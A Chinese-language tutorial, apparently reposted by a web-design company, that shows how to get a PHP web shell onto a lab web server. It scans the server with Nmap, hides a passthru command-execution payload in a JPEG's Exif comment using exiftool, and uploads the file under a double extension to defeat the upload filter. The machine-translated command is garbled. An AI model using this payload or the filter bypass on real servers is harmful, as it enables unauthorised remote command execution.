Shell如何上载到Web服务器并获得Root

这篇文章主要介绍Shell如何上载到Web服务器并获得Root,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!

专注于为中小企业提供成都网站建设、成都网站设计服务,电脑端+手机端+微信端的三站合一,更高效的管理,为中小企业沂南免费做网站提供优质的服务。我们立足成都,凝聚了一批互联网行业人才,有力地推动了近1000家企业的稳健成长,帮助中小企业通过网站建设实现规模扩充和转变。

要求

本教程的这一部分将需要Nmap。

步骤1:扫描服务器

对于本教程,我在网络上设置了易受攻击的服务器。让我们来扫描一下。  

Shell如何上载到Web服务器并获得Root

Nmap找到了两个开放端口:80和22,因此我们知道服务器同时具有HTTP和SSH服务。让我们访问该网页...

第2步:上传尝试

让我们查看上传页面...

Shell如何上载到Web服务器并获得Root

该表格告诉我们该文件必须是.jpeg,.jpg或.png文件。但是,以防万一,我们将尝试上传恶意的PHP文件。

Shell如何上载到Web服务器并获得Root

真是的 它不会上传。但是,如果我们将恶意代码添加到图片文件的Exif数据中怎么办?

步骤3:将图片后门

为了上传我们的外壳,我们需要使用合法的图片文件。为了使我们的代码运行,我们需要将PHP代码添加到Exif数据中。输入此命令:

exiftool -Comment =“ <?php passthru(\ $ _ GET'cmd'); _halt_compiler();” /root/picture.jpeg

在\ $ _ GET'cmd'); 代码是读取我们的命令的内容,而_halt_compiler(); 防止文件检查系统继续读取二进制数据。

现在,让我们运行命令的PHP代码被添加到注释中。将文件重命名为picture.php.jpeg,以便强制网站处理PHP代码。

步骤4:再试一次    

现在,让我们上传后门文件。

Shell如何上载到Web服务器并获得Root

是! 有效!现在,我们可以使用命令通过Web浏览器对其进行控制。

以上是“Shell如何上载到Web服务器并获得Root”这篇文章的所有内容,感谢各位的阅读!希望分享的内容对大家有帮助,更多相关知识,欢迎关注创新互联行业资讯频道!


网页名称:Shell如何上载到Web服务器并获得Root
文章转载:http://scyanting.com/article/jspgic.html